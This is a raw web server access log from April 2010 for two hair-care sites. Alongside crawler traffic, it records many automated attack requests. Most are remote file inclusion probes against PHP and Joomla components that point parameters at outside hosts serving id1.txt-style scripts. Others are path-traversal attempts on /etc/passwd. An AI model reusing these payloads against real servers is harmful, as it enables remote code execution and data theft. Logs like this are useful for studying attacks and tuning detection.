77.88.25.28 - - [26/Apr/2010:10:03:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13066 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.222.152.66 - - [26/Apr/2010:10:04:10 -0700] "GET /logs/access_100412.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:10:04:10 -0700] "GET /logs/access_091228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:10:04:33 -0700] "GET /logs/access_091228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:03 -0700] "GET /logs/access_100301.log//bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:03 -0700] "GET /logs//bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:03 -0700] "GET /bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:10:06:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13287 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:14 -0700] "GET /bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:14 -0700] "GET /logs//bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:06:14 -0700] "GET /logs/access_100301.log//bbs//////////good.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt?????????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:09:05 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:10:10:40 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:10:15:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18870 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.231.60.209 - - [26/Apr/2010:10:19:01 -0700] "GET //bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:10:19:01 -0700] "GET /logs/access_100412.log///bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:10:19:02 -0700] "GET /logs///bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:10:19:07 -0700] "GET /logs/access_100412.log///bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:10:19:07 -0700] "GET /logs///bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:10:19:07 -0700] "GET //bbs//write_update.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.78.137.242 - - [26/Apr/2010:10:28:09 -0700] "GET /start_lobby.php?CONFIG[MWCHAT_Libs]http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
75.120.58.176 - - [26/Apr/2010:10:31:12 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
75.120.58.176 - - [26/Apr/2010:10:31:13 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
75.120.58.176 - - [26/Apr/2010:10:31:13 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
200.62.142.217 - - [26/Apr/2010:10:32:51 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.62.142.217 - - [26/Apr/2010:10:32:51 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.62.142.217 - - [26/Apr/2010:10:32:54 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.120.58.176 - - [26/Apr/2010:10:34:26 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:10:36:23 -0700] "GET /body_default.php?error=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:10:36:23 -0700] "GET /logs/access_100419.log/body_default.php?error=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:10:36:23 -0700] "GET /logs/body_default.php?error=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.174.93.214 - - [26/Apr/2010:10:36:47 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://lancer.od.ua/tag/audi/" "Opera/9.0 (Windows NT 5.1; U; en)" "www.freehairsecrets.com"
93.174.93.214 - - [26/Apr/2010:10:36:47 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:10:39:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14971 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
118.217.216.132 - - [26/Apr/2010:10:40:19 -0700] "GET //bbs//write_update.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt???????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.217.216.132 - - [26/Apr/2010:10:40:21 -0700] "GET /logs///bbs//write_update.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt???????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.217.216.132 - - [26/Apr/2010:10:40:23 -0700] "GET /logs/access.log%20%20///bbs//write_update.php?board_skin_path=http://www.myhappyclinic.co.kr///data/log/id1.txt???????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.80.193.28 - - [26/Apr/2010:10:44:19 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {597450A9-C7D2-4697-A640-49F861E2DFDC}; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:10:46:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13683 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:10:50:50 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:10:50:50 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:10:50:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.172.38.2 - - [26/Apr/2010:10:51:04 -0700] "GET /logs/access.log%20%20//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:10:51:04 -0700] "GET /index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:10:51:04 -0700] "GET /logs//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:10:58:59 -0700] "GET /index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:10:58:59 -0700] "GET /logs//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:10:58:59 -0700] "GET /logs/access.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.38.2 - - [26/Apr/2010:11:01:59 -0700] "GET /logs/access.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:11:04:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13155 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.172.38.2 - - [26/Apr/2010:11:06:15 -0700] "GET /logs/access_100419.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.38 - - [26/Apr/2010:11:06:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12551 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:11:06:58 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.172.38.2 - - [26/Apr/2010:11:10:34 -0700] "GET /logs/access_100419.log//index.php?option=com_remository&mosConfig.absolute.path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:11:13:16 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:11:13:17 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:11:13:17 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:23:38 -0700] "GET /logs/access_100118.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:23:38 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:23:38 -0700] "GET /logs/access_100412.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:23:38 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:11:24:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13538 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:11:25:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12829 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:11:33:29 -0700] "GET /logs/access_100412.log%20%20//components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:11:33:29 -0700] "GET /components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:11:33:29 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:11:38:32 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:11:38:32 -0700] "GET /components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:11:38:32 -0700] "GET /logs/access_100412.log%20%20//components/com_flyspray/startdown.php?file=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:11:39:18 -0700] "GET /logs//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt??????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:11:39:18 -0700] "GET /logs/access_100301.log%20%20//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt??????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:11:39:18 -0700] "GET /bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt??????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.108 - - [26/Apr/2010:11:40:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.126 - - [26/Apr/2010:11:40:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14675 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:11:42:10 -0700] "GET /logs/access_100329.log%20%20//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt??????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:11:43:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14129 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:43:45 -0700] "GET /logs/access_091130.log////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:43:45 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:43:48 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.0" 200 911 "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:46:53 -0700] "GET /logs/access_091130.log////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:46:53 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 927 "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [26/Apr/2010:11:46:53 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.250.57.232 - - [26/Apr/2010:11:49:47 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "-" "Wget/1.11.4" "www.freehairsecrets.com"
196.40.10.141 - - [26/Apr/2010:11:50:46 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "www.freehairsecrets.com"
196.40.10.141 - - [26/Apr/2010:11:50:52 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:11:55:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13342 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:56:13 -0700] "GET /logs/access_100315.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:56:13 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:56:13 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
116.122.36.34 - - [26/Apr/2010:11:56:51 -0700] "GET /logs/access_100301.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:11:58:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15329 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
88.250.57.232 - - [26/Apr/2010:11:58:55 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "-" "Wget/1.11.4" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:28 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:28 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:28 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:33 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:03:36 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:05:33 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:05:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:05:33 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:05:58 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [26/Apr/2010:12:06:07 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:06:23 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:06:23 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.165.81.34 - - [26/Apr/2010:12:06:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.18.81 - - [26/Apr/2010:12:06:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
